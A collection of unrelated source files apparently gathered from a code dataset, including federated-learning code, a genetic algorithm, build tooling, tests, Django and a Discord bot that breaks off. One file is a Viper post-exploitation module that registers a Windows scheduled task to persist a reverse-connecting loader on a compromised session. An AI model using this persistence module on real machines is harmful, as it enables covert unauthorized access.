if self.role == consts.GUEST or host_do_evaluate:
fold_name = "_".join(['train', 'fold', str(fold_num)])
pred_res = train_pred_res.mapValues(lambda value: value + ['train'])
self.evaluate(pred_res, fold_name, model)
this_flowid = 'predict_validate.' + str(fold_num)
LOGGER.debug("In CV, set_flowid flowid is : {}".format(this_flowid))
model.set_flowid(this_flowid)
pred_res = model.predict(test_data)
model.set_predict_data_schema(pred_res, test_data.schema)
# if pred_res is not None:
if self.role == consts.GUEST or host_do_evaluate:
fold_name = "_".join(['validate', 'fold', str(fold_num)])
pred_res = pred_res.mapValues(lambda value: value + ['validate'])
self.evaluate(pred_res, fold_name, model)
LOGGER.debug("Finish fold: {}".format(fold_num))
fold_num += 1
LOGGER.debug("Finish all fold running")
return
def _arbiter_run(self, original_model):
for fold_num in range(self.n_splits):
LOGGER.info("KFold flowid is: {}".format(fold_num))
model = copy.deepcopy(original_model)
this_flowid = 'train.' + str(fold_num)
model.set_flowid(this_flowid)
model.set_cv_fold(fold_num)
model.fit(None)
this_flowid = 'predict_train.' + str(fold_num)
model.set_flowid(this_flowid)
model.predict(None)
this_flowid = 'predict_validate.' + str(fold_num)
model.set_flowid(this_flowid)
model.predict(None)
def _align_data_index(self, data_instance, flowid, data_application=None):
header = data_instance.schema.get('header')
if data_application is None:
# LOGGER.warning("not data_application!")
# return
raise ValueError("In _align_data_index, data_application should be provided.")
transfer_variable = CrossValidationTransferVariable()
if data_application == consts.TRAIN_DATA:
transfer_id = transfer_variable.train_sid
elif data_application == consts.TEST_DATA:
transfer_id = transfer_variable.test_sid
else:
raise ValueError("In _align_data_index, data_application should be provided.")
if self.role == consts.GUEST:
data_sid = data_instance.mapValues(lambda v: 1)
transfer_id.remote(data_sid,
role=consts.HOST,
idx=-1,
suffix=(flowid,))
LOGGER.info("remote {} to host".format(data_application))
return data_instance
elif self.role == consts.HOST:
data_sid = transfer_id.get(idx=0,
suffix=(flowid,))
LOGGER.info("get {} from guest".format(data_application))
join_data_insts = data_sid.join(data_instance, lambda s, d: d)
join_data_insts.schema['header'] = header
return join_data_insts
def evaluate(self, eval_data, fold_name, model):
if eval_data is None:
return
eval_obj = Evaluation()
# LOGGER.debug("In KFold, evaluate_param is: {}".format(self.evaluate_param.__dict__))
# eval_obj._init_model(self.evaluate_param)
eval_param = model.get_metrics_param()
eval_param.check_single_value_default_metric()
eval_obj._init_model(eval_param)
eval_obj.set_tracker(model.tracker)
eval_data = {fold_name: eval_data}
eval_obj.fit(eval_data)
eval_obj.save_data()
|
the-stack_106_30679 | # -*- coding: utf-8 -*-
# @File : PostMulitMsfBypassUAC.py
# @Date : 2019/3/15
# @Desc :
from Lib.ModuleAPI import *
class PostModule(PostMSFRawModule):
NAME_ZH = "Windows计划任务持久化"
DESC_ZH = "模块注册计划任务实现持久化,当前Session所在用户登录系统时执行载荷\n" \
"使用模块时请勿关闭对应监听,Loader启动需要回连监听获取核心库文件."
NAME_EN = "Windows scheduled task persistence"
DESC_EN = "The module adds scheduled tasks to achieve persistence, and the load.exe execute when the user of session login to the system\n" \
"When using the module, do not turn off the corresponding handler, the Loader needs to be connected back to the monitoring to obtain the core library files."
REQUIRE_SESSION = True
MODULETYPE = TAG2TYPE.Persistence
PLATFORM = ["Windows"] # 平台
PERMISSIONS = ["User", "Administrator", "SYSTEM", ] # 所需权限
ATTCK = ["T1053"] # ATTCK向量
README = ["https://www.yuque.com/vipersec/module/iprzfo"]
REFERENCES = ["https://attack.mitre.org/techniques/T1053/"]
AUTHOR = "Viper"
OPTIONS = register_options([
OptionHander(),
OptionFileEnum(ext=['exe'], required=False),
OptionCacheHanderConfig(),
])
def __init__(self, sessionid, ipaddress, custom_param):
super().__init__(sessionid, ipaddress, custom_param)
self.type = "exploit"
self.mname = "windows/local/persistence_s4u_persistence_api"
def check(self):
"""执行前的检查函数"""
session = Session(self._sessionid)
if session.is_windows:
pass
else:
return False, "此模块只支持Windows的Meterpreter", "This module only supports Meterpreter for Windows"
if 'windows' not in self.get_handler_payload().lower():
return False, "选择handler错误,请选择windows平台的监听", "Select the handler error, please select the handler of the windows platform"
self.set_payload_by_handler()
filepath = self.get_fileoption_filepath(msf=True)
if filepath is None: # 根据监听进行持久化
exe_filepath = self.generate_bypass_exe_file(template="REVERSE_HEX_BASE")
else:
Notice.send_info("使用自定义的loader进行持久化", "Use custom loader for persistence")
exe_filepath = filepath
self.set_msf_option("EXE::Custom", exe_filepath)
return True, None
def callback(self, status, message, data):
# 调用父类函数存储结果(必须调用)
if status:
self.log_info("模块执行完成", "Module operation completed")
self.log_good("计划任务详情", "Scheduled task details")
self.log_raw(data.get('psresult'))
self.log_good(f"EXE路径: {data.get('victim_path')}", f"EXE path: {data.get('victim_path')}")
self.log_good(f"用户下次登录时生效", "Take effect the next time the user login")
self.cache_handler()
else:
self.log_error("模块执行失败", "Module execution failed")
self.log_error(message, message)
|
the-stack_106_30682 | from __future__ import print_function, division
import string
import numpy as np
class GeneticAlgorithm():
"""An implementation of a Genetic Algorithm which will try to produce the user
specified target string.
Parameters:
-----------
target_string: string
The string which the GA should try to produce.
population_size: int
The number of individuals (possible solutions) in the population.
mutation_rate: float
The rate (or probability) of which the alleles (chars in this case) should be
randomly changed.
"""
def __init__(self, target_string, population_size, mutation_rate):
self.target = target_string
self.population_size = population_size
self.mutation_rate = mutation_rate
self.letters = [" "] + list(string.letters)
def _initialize(self):
""" Initialize population with random strings """
self.population = []
for _ in range(self.population_size):
# Select random letters as new individual
individual = "".join(np.random.choice(self.letters, size=len(self.target)))
self.population.append(individual)
def _calculate_fitness(self):
""" Calculates the fitness of each individual in the population """
population_fitness = []
for individual in self.population:
# Calculate loss as the alphabetical distance between
# the characters in the individual and the target string
loss = 0
for i in range(len(individual)):
letter_i1 = self.letters.index(individual[i])
letter_i2 = self.letters.index(self.target[i])
loss += abs(letter_i1 - letter_i2)
fitness = 1 / (loss + 1e-6)
population_fitness.append(fitness)
return population_fitness
def _mutate(self, individual):
""" Randomly change the individual's characters with probability
self.mutation_rate """
individual = list(individual)
for j in range(len(individual)):
# Make change with probability mutation_rate
if np.random.random() < self.mutation_rate:
individual[j] = np.random.choice(self.letters)
# Return mutated individual as string
return "".join(individual)
def _crossover(self, parent1, parent2):
""" Create children from parents by crossover """
# Select random crossover point
cross_i = np.random.randint(0, len(parent1))
child1 = parent1[:cross_i] + parent2[cross_i:]
child2 = parent2[:cross_i] + parent1[cross_i:]
return child1, child2
def run(self, iterations):
# Initialize new population
self._initialize()
for epoch in range(iterations):
population_fitness = self._calculate_fitness()
fittest_individual = self.population[np.argmax(population_fitness)]
highest_fitness = max(population_fitness)
# If we have found individual which matches the target => Done
if fittest_individual == self.target:
break
# Set the probability that the individual should be selected as a parent
# proportionate to the individual's fitness.
parent_probabilities = [fitness / sum(population_fitness) for fitness in population_fitness]
# Determine the next generation
new_population = []
for i in np.arange(0, self.population_size, 2):
# Select two parents randomly according to probabilities
parent1, parent2 = np.random.choice(self.population, size=2, p=parent_probabilities, replace=False)
# Perform crossover to produce offspring
child1, child2 = self._crossover(parent1, parent2)
# Save mutated offspring for next generation
new_population += [self._mutate(child1), self._mutate(child2)]
print ("[%d Closest Candidate: '%s', Fitness: %.2f]" % (epoch, fittest_individual, highest_fitness))
self.population = new_population
print ("[%d Answer: '%s']" % (epoch, fittest_individual))
|
the-stack_106_30683 | from __future__ import print_function
import os
import shutil
import subprocess
import logging
import pyhhi.build.common.ver as ver
import pyhhi.build.common.bldtools as bldtools
from pyhhi.build.common.system import SystemInfo
class BjamBuilder(object):
"""The BjamBuilder class supports building a new bjam executable."""
def __init__(self, sys_info, top_dir, bb_version):
self._logger = logging.getLogger(__name__)
bjam_src_tree_list = []
self._sys_info = sys_info
self._bjam_src_dir = None
self._top_dir = top_dir
self._bb_version = bb_version
self._toolset = None
self._tmp_dirs = []
if self._sys_info.is_windows():
self._bjam_names = ('b2.exe', 'bjam.exe')
else:
self._bjam_names = ('b2', 'bjam')
if sys_info.is_windows():
build_script = 'build.bat'
else:
build_script = 'build.sh'
# the bjam source is supposed to come from the boost source tree.
assert bb_version is not None
boost_tools_dir = os.path.join(self._top_dir, 'tools')
bjam_src_tree_list.append(os.path.join(boost_tools_dir, 'build', 'src', 'engine'))
bjam_src_tree_list.append(os.path.join(boost_tools_dir, 'build', 'v2', 'engine'))
bjam_src_tree_list.append(os.path.join(boost_tools_dir, 'build', 'v2', 'engine', 'src'))
bjam_src_tree_list.append(os.path.join(boost_tools_dir, 'jam', 'src'))
for d in bjam_src_tree_list:
# check for the build script to figure out which source location holds the bjam source files.
if os.path.exists(os.path.join(d, build_script)):
self._bjam_src_dir = d
break
if self._bjam_src_dir is not None:
# create a new bldtools suitable to build bjam on this platform.
self._toolset = bldtools.BjamToolset(sys_info, bb_version)
def build(self, target_arch='x86_64'):
"""Builds the b2 executable from source and returns the full path to the executable."""
assert self._bjam_src_dir is not None
if self._sys_info.is_windows() and (ver.version_compare(self._bb_version, (1, 66, 0)) >= 0):
target_arch = 'x86'
# create a new list of temporary directories to be removed after the bjam executable has been installed.
self._tmp_dirs = []
bjam_bin_dir = os.path.join(self._bjam_src_dir, self._get_bjam_bin_dir_folder(target_arch))
self._tmp_dirs.append(bjam_bin_dir)
b2_prog_path = os.path.join(bjam_bin_dir, self._bjam_names[0])
bjam_prog_path = os.path.join(bjam_bin_dir, self._bjam_names[1])
bootstrap_dir = os.path.join(self._bjam_src_dir, 'bootstrap')
self._tmp_dirs.append(bootstrap_dir)
if os.path.exists(bootstrap_dir):
# in case a previous build failed to remove the temporary files, remove bootstrap completely.
shutil.rmtree(bootstrap_dir)
cur_dir = os.getcwd()
os.chdir(self._bjam_src_dir)
print("========================================================")
print("Start building bjam in", self._bjam_src_dir, "...")
print("========================================================")
build_script_args = []
if self._sys_info.is_windows():
build_script = os.path.join(self._bjam_src_dir, 'build.bat')
build_script_args.append(build_script)
bjam_toolset_arg = self._toolset.get_bjam_toolset(build_script_format=True)
build_script_args.append(bjam_toolset_arg)
if target_arch == 'x86_64':
# build.bat builds a 32 bit b2 executable by default but we prefer a native b2.
if bjam_toolset_arg in ['vc141', 'vc14']:
build_script_args.append('amd64')
else:
build_script_args.append('x86_amd64')
else:
build_script = os.path.join(self._bjam_src_dir, 'build.sh')
build_script_args.append(build_script)
retv = subprocess.call(build_script_args)
if retv != 0:
raise Exception("Building bjam failed. Please contact technical support.")
# restore the previous current working directory
os.chdir(cur_dir)
if os.path.exists(b2_prog_path):
return b2_prog_path
elif os.path.exists(bjam_prog_path):
return bjam_prog_path
else:
assert False
return None
def remove_tmp_files(self):
"""Removes all temporary files created by the bjam build script."""
for d in self._tmp_dirs:
if os.path.exists(d):
try:
shutil.rmtree(d)
except WindowsError as exc:
print("WARNING: ignoring spurious windows error [" + str(exc.winerror) + "]: " + exc.strerror + " raised by shutil.rmtree().")
if os.path.exists(d):
file_list = os.listdir(d)
if file_list:
print("The directory '" + d + "' is not empty for unknown reason: ", file_list)
self._tmp_dirs = []
def _get_bjam_bin_dir_folder(self, target_arch='x86_64'):
if self._sys_info.is_windows():
bin_dir = 'bin.nt' + target_arch
elif self._sys_info.is_linux():
bin_dir = 'bin.linux' + target_arch
elif self._sys_info.is_macosx():
bin_dir = 'bin.macosx' + target_arch
else:
assert False
return bin_dir
class BjamLauncher(object):
def __init__(self, sys_info=None, verbosity=1):
self._logger = logging.getLogger(__name__)
if sys_info is None:
sys_info = SystemInfo()
self._sys_info = sys_info
self._verbosity_level = verbosity
def get_optimal_number_bjam_jobs(self):
"""Returns the optimal number of bjam jobs."""
bjam_jobs = self._sys_info.get_number_processors()
if 'BJAM_MAX_JOBS' in os.environ:
bjam_max_jobs = int(os.environ['BJAM_MAX_JOBS'], 10)
if bjam_jobs > bjam_max_jobs:
bjam_jobs = bjam_max_jobs
assert bjam_jobs >= 1
return bjam_jobs
def launch(self, argv):
"""Launch a bjam build and block until it terminates."""
if self._verbosity_level > 0:
# assemble the bjam command line for logging purposes
joiner = ' '
cmd_line = joiner.join(argv)
print("Launching: " + cmd_line)
retv = subprocess.call(argv)
if retv < 0:
self._logger.debug("child was terminated by signal: %d", -retv)
else:
self._logger.debug("child returned: %d", retv)
return retv
|
the-stack_106_30684 | from typing import List
from unittest.mock import AsyncMock
from urllib.parse import ParseResult, parse_qs, urlencode, urlparse
import pytest
from box import Box # type: ignore
from fastapi import FastAPI
from fastapi.testclient import TestClient
from pydantic.dataclasses import dataclass
from requests import Response # type: ignore
from spylib.oauth import OfflineToken, OnlineToken, init_oauth_router
from spylib.utils import JWTBaseModel, hmac, now_epoch
HANDLE = 'HANDLE'
SHOPIFY_API_KEY = 'API_KEY'
SHOPIFY_SECRET_KEY = 'SECRET_KEY'
TEST_STORE = 'test.myshopify.com'
TEST_DATA = Box(
dict(
app_scopes=['write_products', 'read_customers'],
user_scopes=['write_orders', 'read_products'],
public_domain='test.testing.com',
private_key='TESTPRIVATEKEY',
post_install=AsyncMock(return_value=JWTBaseModel()),
post_login=AsyncMock(return_value=None),
app_handle=HANDLE,
api_key=SHOPIFY_API_KEY,
api_secret_key=SHOPIFY_SECRET_KEY,
)
)
OFFLINETOKEN_DATA = dict(access_token='OFFLINETOKEN', scope=','.join(TEST_DATA.app_scopes))
ONLINETOKEN_DATA = dict(
access_token='ONLINETOKEN',
scope=','.join(TEST_DATA.app_scopes),
expires_in=86399,
associated_user_scope=','.join(TEST_DATA.user_scopes),
associated_user={
'id': 902541635,
'first_name': 'John',
'last_name': 'Smith',
'email': '[email protected]',
'email_verified': True,
'account_owner': True,
'locale': 'en',
'collaborator': False,
},
)
@dataclass
class MockHTTPResponse:
status_code: int
jsondata: dict
headers: dict = None # type: ignore
def json(self):
return self.jsondata
@pytest.mark.asyncio
async def test_oauth(mocker):
app = FastAPI()
oauth_router = init_oauth_router(**TEST_DATA)
app.include_router(oauth_router)
client = TestClient(app)
# --------- Test the initialization endpoint -----------
# Missing shop argument
response = client.get('/shopify/auth')
assert response.status_code == 422
assert response.json() == {
'detail': [
{'loc': ['query', 'shop'], 'msg': 'field required', 'type': 'value_error.missing'}
],
}
# Happy path
response = client.get('/shopify/auth', params=dict(shop=TEST_STORE), allow_redirects=False)
query = check_oauth_redirect_url(
response=response, client=client, path='/admin/oauth/authorize', scope=TEST_DATA.app_scopes
)
state = check_oauth_redirect_query(query=query, scope=TEST_DATA.app_scopes)
# Callback calls to get tokens
shopify_request_mock = mocker.patch('httpx.AsyncClient.request', new_callable=AsyncMock)
shopify_request_mock.side_effect = [
MockHTTPResponse(status_code=200, jsondata=OFFLINETOKEN_DATA),
MockHTTPResponse(status_code=200, jsondata=ONLINETOKEN_DATA),
]
# --------- Test the callback endpoint for installation -----------
query_str = urlencode(
dict(shop=TEST_STORE, state=state, timestamp=now_epoch(), code='INSTALLCODE')
)
hmac_arg = hmac.calculate_from_message(secret=SHOPIFY_SECRET_KEY, message=query_str)
query_str += '&hmac=' + hmac_arg
response = client.get('/callback', params=query_str, allow_redirects=False)
query = check_oauth_redirect_url(
response=response,
client=client,
path='/admin/oauth/authorize',
scope=TEST_DATA.user_scopes,
)
state = check_oauth_redirect_query(
query=query,
scope=TEST_DATA.user_scopes,
query_extra={'grant_options[]': ['per-user']},
)
assert await shopify_request_mock.called_with(
method='post',
url=f'https://{TEST_STORE}/admin/oauth/access_token',
json={
'client_id': SHOPIFY_API_KEY,
'client_secret': SHOPIFY_SECRET_KEY,
'code': 'INSTALLCODE',
},
)
TEST_DATA.post_install.assert_called_once()
TEST_DATA.post_install.assert_called_with('test', OfflineToken(**OFFLINETOKEN_DATA))
# --------- Test the callback endpoint for login -----------
query_str = urlencode(
dict(shop=TEST_STORE, state=state, timestamp=now_epoch(), code='LOGINCODE'), safe='=,&/[]:'
)
hmac_arg = hmac.calculate_from_message(secret=SHOPIFY_SECRET_KEY, message=query_str)
query_str += '&hmac=' + hmac_arg
response = client.get('/callback', params=query_str, allow_redirects=False)
state = check_oauth_redirect_url(
response=response,
client=client,
path=f'/admin/apps/{HANDLE}',
scope=TEST_DATA.user_scopes,
)
assert await shopify_request_mock.called_with(
method='post',
url=f'https://{TEST_STORE}/admin/oauth/access_token',
json={
'client_id': SHOPIFY_API_KEY,
'client_secret': SHOPIFY_SECRET_KEY,
'code': 'LOGINCODE',
},
)
TEST_DATA.post_login.assert_called_once()
TEST_DATA.post_login.assert_called_with('test', OnlineToken(**ONLINETOKEN_DATA))
def check_oauth_redirect_url(response: Response, client, path: str, scope: List[str]) -> str:
print(response.text)
assert response.status_code == 307
parsed_url = urlparse(client.get_redirect_target(response))
expected_parsed_url = ParseResult(
scheme='https',
netloc=TEST_STORE,
path=path,
query=parsed_url.query, # We check that separately
params='',
fragment='',
)
assert parsed_url == expected_parsed_url
return parsed_url.query
def check_oauth_redirect_query(query: str, scope: List[str], query_extra: dict = {}) -> str:
parsed_query = parse_qs(query)
state = parsed_query.pop('state', [''])[0]
expected_query = dict(
client_id=[SHOPIFY_API_KEY],
redirect_uri=[f'https://{TEST_DATA.public_domain}/callback'],
scope=[','.join(scope)],
)
expected_query.update(query_extra)
assert parsed_query == expected_query
return state
|
the-stack_106_30685 | """
This command is used to add an Institution to the database.
Execution: python manage.py add_institution <name> <cas_server_url>
"""
from django.core.exceptions import ValidationError
from django.core.management.base import BaseCommand, CommandError
from django.core.validators import URLValidator
from django.utils.text import slugify
from uniauth.models import Institution
class Command(BaseCommand):
help = "Adds an institution to the database."
def add_arguments(self, parser):
parser.add_argument('name')
parser.add_argument('cas_server_url')
parser.add_argument(
'--update-existing',
action='store_true',
default=False,
help='Update the institution, if it already exists.')
def handle(self, *args, **options):
slug = slugify(options['name'])
cas_server_url = options['cas_server_url']
if (not options['update_existing']
and Institution.objects.filter(slug=slug).exists()):
raise CommandError("An institution with slug '" +
slug + "' already exists.")
try:
validator = URLValidator()
validator(options['cas_server_url'])
except ValidationError:
raise CommandError("Provided CAS server URL '" +
cas_server_url + "' is malformed.")
institution, created = Institution.objects.get_or_create(
name=options['name'],
slug=slug,
defaults={'cas_server_url': cas_server_url}
)
if created:
self.stdout.write("Created institution '%s'.\n" % str(institution))
elif institution.cas_server_url != cas_server_url:
# If institution already exists but with a different URL,
# update it.
institution.cas_server_url = cas_server_url
institution.save()
self.stdout.write("Updated institution '%s'.\n" % str(institution))
|
the-stack_106_30686 | from setuptools import setup, find_packages
install_requires = [line.rstrip() for line in open("requirements/requirements.txt", "r")]
setup(
name="inhandpy",
version="0.0.1",
description="PatchGraph: In-hand tactile tracking with learned surface normals",
url="",
author="Paloma Sodhi",
author_email="[email protected]",
license="LICENSE",
packages=find_packages("src"),
package_dir={"": "src"},
install_requires=install_requires,
python_requires=">=3.6",
) |
the-stack_106_30687 | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
"""
Tests for the HTTP challenge authentication implementation. These tests aren't parallelizable, because
the challenge cache is global to the process.
"""
try:
from unittest.mock import Mock
except ImportError: # python < 3.3
from mock import Mock
from azure.core.credentials import AccessToken
from azure.core.pipeline import Pipeline
from azure.core.pipeline.transport import HttpRequest
from azure.keyvault.keys._shared import ChallengeAuthPolicy, HttpChallenge, HttpChallengeCache
import pytest
from helpers import mock_response, Request, validating_transport
def test_challenge_cache():
# ensure the test starts with an empty cache
HttpChallengeCache.clear()
url_a = "https://azure.service.a"
challenge_a = HttpChallenge(url_a, "Bearer authorization=authority A, resource=resource A")
url_b = "https://azure.service.b"
challenge_b = HttpChallenge(url_b, "Bearer authorization=authority B, resource=resource B")
for url, challenge in zip((url_a, url_b), (challenge_a, challenge_b)):
HttpChallengeCache.set_challenge_for_url(url, challenge)
assert HttpChallengeCache.get_challenge_for_url(url) == challenge
assert HttpChallengeCache.get_challenge_for_url(url + "/some/path") == challenge
assert HttpChallengeCache.get_challenge_for_url(url + "/some/path?with-query=string") == challenge
assert HttpChallengeCache.get_challenge_for_url(url + ":443") == challenge
HttpChallengeCache.remove_challenge_for_url(url)
assert not HttpChallengeCache.get_challenge_for_url(url)
def test_challenge_parsing():
authority = "https://login.authority.net/tenant"
resource = "https://challenge.resource"
challenge = HttpChallenge(
"https://request.uri", challenge="Bearer authorization={}, resource={}".format(authority, resource)
)
assert challenge.get_authorization_server() == authority
assert challenge.get_resource() == resource
def test_policy():
# ensure the test starts with an empty cache
HttpChallengeCache.clear()
expected_scope = "https://challenge.resource/.default"
expected_token = "expected_token"
challenge = Mock(
status_code=401,
headers={
"WWW-Authenticate": 'Bearer authorization="https://login.authority.net/tenant", resource={}'.format(
expected_scope
)
},
)
success = Mock(status_code=200)
data = {"spam": "eggs"}
responses = (r for r in (challenge, success))
def send(request):
response = next(responses)
if response is challenge:
# this is the first request
assert not request.body
assert request.headers["Content-Length"] == "0"
elif response is success:
# this is the second request
assert request.body == data
assert expected_token in request.headers["Authorization"]
return response
def get_token(*scopes):
assert len(scopes) is 1
assert scopes[0] == expected_scope
return AccessToken(expected_token, 0)
credential = Mock(get_token=Mock(wraps=get_token))
pipeline = Pipeline(policies=[ChallengeAuthPolicy(credential=credential)], transport=Mock(send=send))
pipeline.run(HttpRequest("POST", "https://azure.service", data=data))
assert credential.get_token.call_count == 1
def test_policy_updates_cache():
"""
It's possible for the challenge returned for a request to change, e.g. when a vault is moved to a new tenant.
When the policy receives a 401, it should update the cached challenge for the requested URL, if one exists.
"""
# ensure the test starts with an empty cache
HttpChallengeCache.clear()
url = "https://azure.service/path"
first_scope = "https://first-scope"
first_token = "first-scope-token"
second_scope = "https://second-scope"
second_token = "second-scope-token"
challenge_fmt = 'Bearer authorization="https://login.authority.net/tenant", resource={}'
# mocking a tenant change:
# 1. first request -> respond with challenge
# 2. second request should be authorized according to the challenge -> respond with success
# 3. third request should match the second -> respond with a new challenge
# 4. fourth request should be authorized according to the new challenge -> respond with success
# 5. fifth request should match the fourth -> respond with success
transport = validating_transport(
requests=(
Request(url),
Request(url, required_headers={"Authorization": "Bearer {}".format(first_token)}),
Request(url, required_headers={"Authorization": "Bearer {}".format(first_token)}),
Request(url, required_headers={"Authorization": "Bearer {}".format(second_token)}),
Request(url, required_headers={"Authorization": "Bearer {}".format(second_token)}),
),
responses=(
mock_response(status_code=401, headers={"WWW-Authenticate": challenge_fmt.format(first_scope)}),
mock_response(status_code=200),
mock_response(status_code=401, headers={"WWW-Authenticate": challenge_fmt.format(second_scope)}),
mock_response(status_code=200),
mock_response(status_code=200),
),
)
tokens = (t for t in [first_token] * 2 + [second_token] * 2)
credential = Mock(get_token=lambda _: AccessToken(next(tokens), 0))
pipeline = Pipeline(policies=[ChallengeAuthPolicy(credential=credential)], transport=transport)
# policy should complete and cache the first challenge
pipeline.run(HttpRequest("GET", url))
# The next request will receive a challenge. The policy should handle it and update the cache entry.
pipeline.run(HttpRequest("GET", url))
|
the-stack_106_30689 | class Node:
def __init__(self, data):
self.data = data
self.next = None
class LinkedList:
def __init__(self):
self.head = None
def push(self, new_data):
new_node = Node(new_data)
new_node.next = self.head
self.head = new_node
def deleteNode(self, key):
temp = self.head
if(temp != None):
if(temp.data == key):
self.head = temp.next
temp = None
return
while(temp != None):
if temp.data == key:
break
prev = temp
temp = temp.next
if(temp == None):
return
prev.next = temp.next
temp = None
def printList(self):
temp = self.head
while(temp):
print(" %d" %(temp.data))
temp = temp.next
llist = LinkedList()
llist.push(7)
llist.push(1)
llist.push(3)
llist.push(2)
print("Creating your Linked List...")
llist.printList()
llist.deleteNode(1)
print("\nLinked List After Deletion of 1: ")
llist.printList()
|
the-stack_106_30692 | """Webbot URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.conf import settings
from WB_app.views import *
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^get/id=(?P<id_solicitud>\w{0,90})/$', get_id, name='GET_byID'),
url(r'^get/list/', get_list, name='GET_all'),
url(r'^get/autor=(?P<nombre>.+?)/$', get_autor, name='GET_byautor'),
url(r'^get/titulo=(?P<titulo>.+?)/$',get_titulo,name='GET_bytitulo'),
url(r'^get/url=(?P<uu>.+?)/$',get_url,name='GET_byurl'),
url(r'^get/isbn=(?P<isbn>.+?)/$',get_isbn,name='GET_byisbn'),
url(r'^get/anio=(?P<anio>.+?)/$',get_anio,name='GET_byanio')
]
|
the-stack_106_30693 | import discord
from discord.ext import commands
from discord.ext.commands import Bot
import random
import asyncio
import aiohttp
print("Online")
bot = commands.Bot(command_prefix="~")
listDebugState = False
dataFiles = {"help":"C:\\Users\\Reese\\Desktop\\nohelp.txt",
"faq":"C:\\Users\\Reese\\Desktop\\faq.txt",
"list":"C:\\Users\\Reese\\Desktop\\list.txt",
"go":"C:\\Users\\Reese\\Desktop\\go.txt",
"token":"C:\\Users\\Reese\\Desktop\\token.txt"
}
messages = {"nohelp":" You have opted out of FAQ help. Opt back in with ~yeshelp",
"yeshelp":" You have opted back into FAQ help."
}
faqMessages = {
"HowToAscend":" You have to click the candle when it is off and hope no one turns it back off for 777 seconds. We have an organized list of who will ascend in which order, please ask to be added by a List Keeper in <#450922435915677697>",
"WhatIsAscension":" Ascension allows you to get out of the hole early. You also receive 51 dedication points and the ability to create a VIP room later.",
"HowToJoinChurch":" To join the church, keep refreshing the main page until you see a hand in the bottom left corner. It appears every 336 seconds. You can use https://poppy-church.glitch.me/hand to help.",
"HowToEnterHole":" To enter the hole, click the self destruct button on your personal report page.",
"HowToGetOut":" You automatically leave the hole after 24 hours, or you can ascend.",
"WhatIsGuardian":" Guardians are picked by Poppy, herself. They are usually highly active members of the community.",
"WhatIsSupportEmail":" The email is [email protected]",
"HowToChangeAvatar":" You can change your your avatar at https://poppy.church/settings",
"ShouldIClickCandle":" Only click the candle if it is your turn to ascend! To ascend with it, you must be the last person to turn it on before it reaches 0!",
"WhatIsCandle":" The candle is used to ascend.",
"WhatIsHole":" The hole is the only real game part of the website right now. Once in the hole, you can try to ascend.",
"HowToEarnPoint":" They seem to increase over time, multiple people have reported getting points if they have their personal report page open at 3:36 PST. You also get 51 dedication by ascending.",
"IsThereAChat":" It is coming, as confirmed by poppy.church support email" ,
"HowToChangeSignature":" You can change your signature by contacting the support email at [email protected]",
"WhatHappensToCandle":" The candle will toggle between on and off. Only click it if it is your turn to ascend!",
"WhatAreWhispers":" Check out the pins in <#450469478342328327>.",
"WhatIsPopcoin":" https://poppy.church/popcoin was found. We are unsure of what it does. Popcoin was the name given by us to the last section on the personal report.",
"WhatArePoints":" We aren't yet sure what the points on the reports are for.",
"WhatIsLove":" Baby don't hurt me, don't hurt me, no more",
"WhenWillIBeAccepted":" We aren't sure when, hopefully soon!",
"WhatIsVip":" You get the ability to create a VIP room by ascending. Nothing else is known about it.",
"WhoClicked":" We used to be able to, but it led to harassment and the ability was removed.",
"WhatIsSelfDestruct":" Self-destructing takes you to the hole.",
"WhatIsHand":" The hand allows you to join the church without a blessing.",
"WhatIsResultOfLeaving":" If you ascend, you gain 51 dedication and the ability to make a VIP room later. If you leave after 24 hours, nothing but freedom.",
"WhatIsCountDown":" The countdown is long as long as the candle is on. Once it reaches 0, someone ascends.",
"WhatIsPhoneNumber":" 831-777-6779",
"Loveyou":" I love you, too.",
"WhereIsTheCandle":" The candle is in the hole",
"WhoIsPoppy":" Poppy is our savior.",
"WhatIsPoppyChurch":" Poppy.Church is the house of our savior (also it's an ARG)."
}
async def send(message, user, response):
print("Message: " + message.content)
print("Response: " + response)
file = open(dataFiles["faq"], "a")
file.write("Message: " + message.content + "\n")
file.write("Response: " + response+"\n\n")
file.close()
await bot.send_message(message.channel,user.mention + response)
def getLines(file):
file = open(file, "r")
lines = file.readlines()
file.close()
return lines
def addDataToFile(key, data):
file = open(dataFiles[key],"a")
file.write(data + "\n")
file.close()
def inDataFile(key, element):
return element in open(dataFiles[key],"r").read()
def inhelp(id):
return id == "339567608338710530" or inDataFile("help", id)
def removeFromSupport(user: discord.Member):
addDataToFile("help", user.id)
def addToSupport(user: discord.Member):
lines = getLines(dataFiles["help"])
"""AddList = lambda list, user : [item for item in list if user.id not in item and not item.isspace()]"""
file = open(dataFiles["help"], "w")
file.writelines([item for item in lines if user.id not in item and not item.isspace()])
file.close()
def inlist(id):
return inDataFile("list", (id))
@bot.command(pass_context=True)
async def nohelp(ctx):
if not inhelp(ctx.message.author.id):
print("No help: " + ctx.message.author.display_name)
addToSupport(ctx.message.author)
await bot.say(ctx.message.author.mention + messages["nohelp"])
@bot.command(pass_context=True)
async def yeshelp(ctx):
if inhelp(ctx.message.author.id):
print("Yes help: "+ctx.message.author.display_name)
removeFromSupport(ctx.message.author)
await bot.say(ctx.message.author.mention + messages["yeshelp"])
@bot.command(pass_context=True)
async def clear(ctx):
if "450680633560399872" in [role.id for role in ctx.message.author.roles] or "449385190926712863" in [role.id for role in ctx.message.author.roles] or "339613815849353219" in [role.id for role in ctx.message.author.roles]:
server = ctx.message.author.server
async for message in (ctx.message.channel.history()):
if message.author == bot.user:
await message.delete()
@bot.command(pass_context=True)
async def sayin(ctx, *args):
if "450680633560399872" in [role.id for role in ctx.message.author.roles] or "449385190926712863" in [role.id for role in ctx.message.author.roles] or "339613815849353219" in [role.id for role in ctx.message.author.roles]:
message = ""
for word in args[1:]:
message += word + " "
await bot.send_message(ctx.message.channel_mentions[0], message)
print(message)
def canEditList(user):
